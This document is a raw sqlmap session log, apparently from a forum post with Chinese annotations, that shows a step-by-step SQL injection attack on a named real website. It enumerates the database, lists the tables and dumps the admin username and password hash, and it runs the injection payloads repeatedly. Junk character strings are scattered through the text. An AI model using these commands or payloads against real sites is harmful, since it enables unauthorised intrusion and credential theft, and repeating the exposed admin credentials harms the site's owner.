starting at: 16:53:54 " D u' Z ~ G1 O: V, q4 M[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: Y/ z6 z% g" V9 L
session file) s2 k. s' l' `% a Y: q
[16:53:54] [INFO] resuming injection data from session file 9 T; l! {2 v4 `; y/ j[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file 9 S, v9 q, W8 O[16:53:54] [INFO] testing connection to the target url " k3 ?1 j, Y4 m0 V8 T0 Z4 V/ osqlmap identified the following injection points with a total of 0 HTTP(s) reque 9 r7 P7 j! }% {4 c- A3 O- Gsts: 3 e3 }( ~4 C: U---" z$ {* r% _% s2 k5 m- T D, N; J7 `
Place: GET 2 ^- m- K( U: i" ]Parameter: id( n0 a7 c2 u2 e% Z2 ]
Type: boolean-based blind. B7 p0 l# |7 S: { C7 E
Title: AND boolean-based blind - WHERE or HAVING clause 1 F d4 }) ~ j7 `7 u: l0 S, ~ Payload: id=276 AND 799=7997 R" H% n7 c$ g. Q8 N& S& `: H
Type: error-based+ U$ k l% L! G/ i7 x: n3 F- d
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 c9 Z* [1 J1 i: m+ b. s4 H) R' @
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* P* U3 b- C% n" e5 f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 3 A+ ^% O, m: h( q4 ?. c9 q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) ! S( {& q) y. r) D" H3 c6 w' c Type: UNION query 0 w$ V5 T/ V+ h5 a8 U8 s% f4 h6 b Title: MySQL UNION query (NULL) - 1 to 10 columns : o: Z4 C9 r: q6 O7 H* q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 p {* F) W6 F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. e5 d% E) z, q$ l' f1 W; k- d
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 Y7 i' Y$ l. F% i
Type: AND/OR time-based blind ( X( z7 E4 M# p0 b% _3 p& Y3 z Title: MySQL > 5.0.11 AND time-based blind 4 F- \9 f3 t" A6 b Payload: id=276 AND SLEEP(5): n, p, m! e0 m. U$ l) m* X
--- $ e4 B! q0 f1 z; {$ f[16:53:55] [INFO] the back-end DBMS is MySQL P& u* ^. C7 v0 |6 C- C u( U* fweb server operating system: Windows 6 Q. Z5 w# Z% C9 a: bweb application technology: Apache 2.2.11, PHP 5.3.0 + d3 T- t' M1 I/ h0 l9 T3 Pback-end DBMS: MySQL 5.0( E* y5 K2 u/ j* y# z9 Z
[16:53:55] [INFO] fetching current user6 Z2 o9 O) Z0 z) Y) b
current user: 'root@localhost' 3 U+ J/ K$ h8 A$ K3 R2 c[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# t! V; G) \ r g8 c. \: N
tput\www.wepost.com.hk'
shutting down at: 16:53:58 6 D, D3 O2 u2 d5 r7 n, O# I, a5 I3 ?1 R! V6 _! F3 j' a
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db 6 a; \- I! E8 D9 ?* [+ }% Ums "Mysql" --current-db /*当前数据库' O( ?8 A) m; Q9 m" T+ D, f# ]
sqlmap/0.9 - automatic SQL injection and database takeover tool / Q5 J x" B5 o5 J; Khttp://sqlmap.sourceforge.net
starting at: 16:54:16' `& q3 @, S3 j8 U* x2 }
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as 3 R- k# x, S& R9 n5 o1 | session file . A& N/ Q* H9 z3 |6 i: o) B[16:54:16] [INFO] resuming injection data from session file" k6 A& _0 K7 ]3 \
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* l l- X, f" N
[16:54:16] [INFO] testing connection to the target url p7 I! ^9 s# j+ J Z6 e3 nsqlmap identified the following injection points with a total of 0 HTTP(s) reque2 a8 |5 r5 R }. x! A
sts: ' T% u+ }4 w H; _- g6 { h--- 7 y2 g. M" U) l. W/ g. {. \Place: GET; g/ y, O4 E; |& `0 ?
Parameter: id " _! }" n- ?4 w0 x) [9 f Type: boolean-based blind * @8 @ T: Y/ S+ U" C! Y Title: AND boolean-based blind - WHERE or HAVING clause& R. T- n+ c! ]8 e; W8 K. E$ M
Payload: id=276 AND 799=799 4 y2 ~; w) Y3 M' V- B0 R Type: error-based + i+ i% t" ^) U) Z4 z9 r1 R2 j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 q3 x5 n- t" B/ t3 S' n
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 Z: i5 Q4 b- H" o! c
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 * T' M! m7 ]0 J: Z/ V; T- o),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' L1 i: n6 h" c/ L) p, T' m% ?
Type: UNION query k O- b. {9 l; u8 Z. J. T/ d Title: MySQL UNION query (NULL) - 1 to 10 columns 6 ^- P. |) b8 M' Q/ E Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR " _3 R) E2 e- G" b8 t# G(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), h! p6 X0 A/ I& UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- Q2 ^$ Y. {1 Q4 g
Type: AND/OR time-based blind5 v7 m0 b/ [& o" w
Title: MySQL > 5.0.11 AND time-based blind+ P' J( C g2 x Q
Payload: id=276 AND SLEEP(5)6 s5 v, |$ B* }. E
---7 ]( Q l. l! m: p' `) e2 N# T* G/ p
[16:54:17] [INFO] the back-end DBMS is MySQL : R& j- c% d1 E* \# X! s0 Sweb server operating system: Windows4 |. [( t8 o& }3 c. m I
web application technology: Apache 2.2.11, PHP 5.3.06 i2 l% c& U3 h5 Z7 e+ \$ \
back-end DBMS: MySQL 5.0 % e' ~0 W/ o/ L: ~- P2 i0 Q" a[16:54:17] [INFO] fetching current database7 C' S8 P2 p5 d- G3 {6 F
current database: 'wepost'& r* Y7 b; y& u0 w% o
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 [. N5 ]& e* J5 J
tput\www.wepost.com.hk'
shutting down at: 16:54:184 |# h: j1 T, _3 O5 G9 @, x S
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db Q3 {( _' P1 Y4 T; L
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名4 w3 v/ L% _* O' q& i3 ^
sqlmap/0.9 - automatic SQL injection and database takeover tool2 l4 B0 t- v1 `2 `+ g& p L http://sqlmap.sourceforge.net
starting at: 16:55:25 0 t7 k" j9 `4 v1 z, C1 I[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, Z; H0 g. B# P( `
session file ' {$ F& M* g. q" r5 p" [[16:55:25] [INFO] resuming injection data from session file2 ]- I6 U- R5 b/ n* g: T) g7 S. v( w
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file % o" D" c* r4 T" U[16:55:25] [INFO] testing connection to the target url* K9 ^' E- r9 @7 n2 P
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 j- Q( h- ~) ?7 W* Z
sts:9 ~* [+ l+ A4 A0 B! u3 I
---& Y' j9 _$ l/ ?" ^
Place: GET2 R- X n# n, k7 z; w$ w6 J
Parameter: id0 S, l- k9 ] _1 Z4 n
Type: boolean-based blind& I) I0 J7 o; K1 o' q+ b8 Z' a& s
Title: AND boolean-based blind - WHERE or HAVING clause, N7 N9 \: U% o! h; g5 Z# ~
Payload: id=276 AND 799=799) \( u6 g0 \! m4 D* e1 j
Type: error-based " `( ~ g: x* R0 [ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 z, M9 l& P$ L, D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 N# ?6 Y2 s( l' Z: H" T- J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 C$ O2 @- z3 `9 Y8 y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) : E# |- Y. w# j z1 b' w Type: UNION query . ~0 z; Y! K+ Y+ G& e# F Title: MySQL UNION query (NULL) - 1 to 10 columns+ m! k, D! r- k* k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 q4 {8 e% o/ e2 q8 l5 o9 H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 7 o# c3 [' @4 J' Z3 _5 `' Z: r$ wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 z1 w2 a8 w8 Z7 y9 R6 c" t* `
Type: AND/OR time-based blind w8 a) j. T: H1 [+ o Title: MySQL > 5.0.11 AND time-based blind7 ]0 V8 s2 E/ {( F& w
Payload: id=276 AND SLEEP(5); l+ S+ V0 w- a1 r, `, K
--- 8 O4 w k3 ^6 D3 q, x& {[16:55:26] [INFO] the back-end DBMS is MySQL , g* T( ?, L/ B6 r) `7 nweb server operating system: Windows+ ?& f" t0 t4 y( ~1 Y
web application technology: Apache 2.2.11, PHP 5.3.0 7 \: c N; d9 A# g# K) Eback-end DBMS: MySQL 5.0/ R! i2 `, O& X
[16:55:26] [INFO] fetching tables for database 'wepost'& t7 `' w( v8 X7 B _+ F: ]& t4 v# l
[16:55:27] [INFO] the SQL query used returns 6 entries$ A" t5 w& k% K4 M( H1 ~
Database: wepost + }3 O6 i2 S" w7 _1 ^[6 tables]* n5 T; f8 l1 r$ |3 \# w2 s
+-------------+4 c9 D; N' r7 N+ u1 M% X2 t
| admin | I% i" ~5 f" k5 b" `3 s: n S7 D
| article | & O; u9 {' `5 M$ y8 w, q| contributor |) b( p8 l# e0 d
| idea |3 [8 o- c% p# o# L
| image | ! Q$ g, F2 R* v| issue |( \" ]2 @/ l6 W7 r: v; h1 j
+-------------+ " S' e% ^# E& i$ k. u[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou % z5 r2 \3 n! v" E- ftput\www.wepost.com.hk'
shutting down at: 16:55:338 S8 ~6 U$ O7 D! p) X1 W3 v
- W2 }4 C8 l+ X( F6 n3 q
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' T$ R6 d2 p% e
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名. C U! f5 {# K3 l t5 G
sqlmap/0.9 - automatic SQL injection and database takeover tool! W- D. C: h$ R. m8 Z http://sqlmap.sourceforge.net
starting at: 16:56:066 P0 }/ K9 Q7 F( I5 u8 H
sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 }0 W) G/ C* \- Z# V
sts: ; z. H. e+ Q- O* T, V! A. s---- M/ o/ y) F$ z- R
Place: GET+ y+ y. @( e# ~. i; h
Parameter: id) [% a5 m2 A5 k7 p; A1 X
Type: boolean-based blind 4 `/ E- U. \) @, q, x2 u; V Title: AND boolean-based blind - WHERE or HAVING clause * j- h1 y# e/ t+ X0 a Payload: id=276 AND 799=7997 [" Z0 ^9 {$ M: G
Type: error-based 2 v- H$ A* M7 d8 `/ {0 \9 {( q% C Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause {/ w# `; ~- |" S% G" S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 H8 Q% h) Q8 ~" p! ~1 ^& u, P! A
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 k+ z8 m/ e6 Q) C. ?. R! ~8 a J
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); A+ o3 { v& R$ G7 V; P
Type: UNION query & {1 O2 D: r! G( I Title: MySQL UNION query (NULL) - 1 to 10 columns " I# y& B; m' H5 Y( Q, N! f" n B Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 X5 t- ^# t6 H$ h/ ]# n& x4 p' k# i
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 9 ?1 `3 v) f* h1 ~$ CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# - I0 H: m9 ?5 M2 d8 T! r& B' s Type: AND/OR time-based blind 5 ]+ A) @/ {. M h/ Q4 z Title: MySQL > 5.0.11 AND time-based blind# |$ ?9 x D( }9 S: a, p. n
Payload: id=276 AND SLEEP(5) 2 k' T) k, B J) ~" a4 A9 s---. j( J3 i' _0 O0 p. d
web server operating system: Windows! k0 p$ M" J2 a; b) g
web application technology: Apache 2.2.11, PHP 5.3.0# S( i K; |4 d* J0 P9 U
back-end DBMS: MySQL 5.0 8 Y: X6 y" B; Y- }3 G7 ^% E- N[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se: Q/ k; `5 J9 m3 h4 R$ ?" f, X
ssion': wepost, wepost4 z. e$ b3 X, K' b- X
Database: wepost6 }1 @* c/ A0 X. \/ t) C- i K2 y
Table: admin 6 A" n* d$ o/ h+ U. L- q/ S[4 columns]: g3 f9 W1 E1 I3 U
+----------+-------------+2 d" ?7 r" u8 d/ U5 a" l
| Column | Type |! T3 b+ |; A6 a9 | |
+----------+-------------+ / T+ S: o) h' I| id | int(11) |5 B% ]) A2 \ v; \8 P
| password | varchar(32) | * A+ u* p9 t4 v| type | varchar(10) |# |! D& G' V( `1 g! [( i- t
| userid | varchar(20) |7 { F1 }& _2 [$ m. Z% C
+----------+-------------+ |8 z0 C, A) i3 F. V
shutting down at: 16:56:19 6 n2 l& d2 W, C! O7 U9 I9 W F3 h# P
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db ; ]" m( E2 Q" C* @$ P5 O+ Jms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容6 `( H8 T/ \# `4 v. k6 t& e G
sqlmap/0.9 - automatic SQL injection and database takeover tool: [& [0 B: D; R& S, B http://sqlmap.sourceforge.net
starting at: 16:57:14 ; l' `' S% A" I/ i1 B" ~* g( f5 Osqlmap identified the following injection points with a total of 0 HTTP(s) reque * X& j+ T: I* L3 csts:5 f9 L6 E2 k1 L
--- " [+ o# R3 q7 V8 @& ^9 j4 f; hPlace: GET 5 A D- P* e$ M' ]# V! H# cParameter: id% Z2 ^) K6 e1 D# R, i: h+ {' }' o
Type: boolean-based blind , d7 [6 c/ }6 l# ~ Title: AND boolean-based blind - WHERE or HAVING clause N6 b1 `. O2 q+ O8 d8 ?- v0 D+ L
Payload: id=276 AND 799=799 & F E) U! Z, f" A# H) n( J' R2 d! b Type: error-based+ P0 ~# @1 V& U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause + v9 d1 K% O- f$ t. f4 w: E3 |8 d" H Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, - u; X# @0 h/ h! i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 8 z2 B+ p& [/ l! `1 U* w0 Z" e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) 8 V o# Z$ T; c7 m$ B Type: UNION query! r8 c2 Y p1 u* W; s d8 b4 P' q
Title: MySQL UNION query (NULL) - 1 to 10 columns - e) f" u5 z, v Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 o; n8 n8 m2 _& Z( v
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), z7 _: r7 \' A# B/ ?" G& Q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- s. M% ?2 b: A8 u5 M, |6 w, @: `
Type: AND/OR time-based blind 2 q4 A- _) C- w Title: MySQL > 5.0.11 AND time-based blind , x& m* K% W; k4 |4 b1 W Payload: id=276 AND SLEEP(5); O# _! ~% x7 S( Q( o
--- / G/ w" d9 E5 m t, n7 A3 ?! lweb server operating system: Windows7 b6 ~8 l4 y& S7 e* G. C2 Y
web application technology: Apache 2.2.11, PHP 5.3.04 L$ j0 J9 a% L" w' |0 P
back-end DBMS: MySQL 5.0 . |& J1 h* w6 o+ Qrecognized possible password hash values. do you want to use dictionary attack o 8 @+ d9 ?5 l4 E; `. S) n& yn retrieved table items? [Y/n/q] y / F; G7 y2 t; P$ P+ ]% Z0 R- Mwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt], h% T! s: k9 a, h0 T% ]
do you want to use common password suffixes? (slow!) [y/N] y 9 C9 M0 i7 |0 v$ @( q) E+ F% ^Database: wepost 3 L5 w5 t" E0 d& Z( w9 ?" ]Table: admin 2 `$ [, M! I" H7 d* V: p[1 entry]) u) d, O( c9 b8 J& A
+----------------------------------+------------+ + f5 D$ l5 O) Y; `! @ {, r| password | userid |' h3 E S" n# t1 G) g6 M
+----------------------------------+------------+ ' m( |0 e+ O) P' E| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 | 7 l, T. U) f+ c7 o' u3 p+----------------------------------+------------+. Y5 H5 B2 B( f7 y" B& \
shutting down at: 16:58:14 ' X1 ^5 ]2 [. T% U$ g2 x$ u ' t6 ^3 W% }5 VD:\Python27\sqlmap>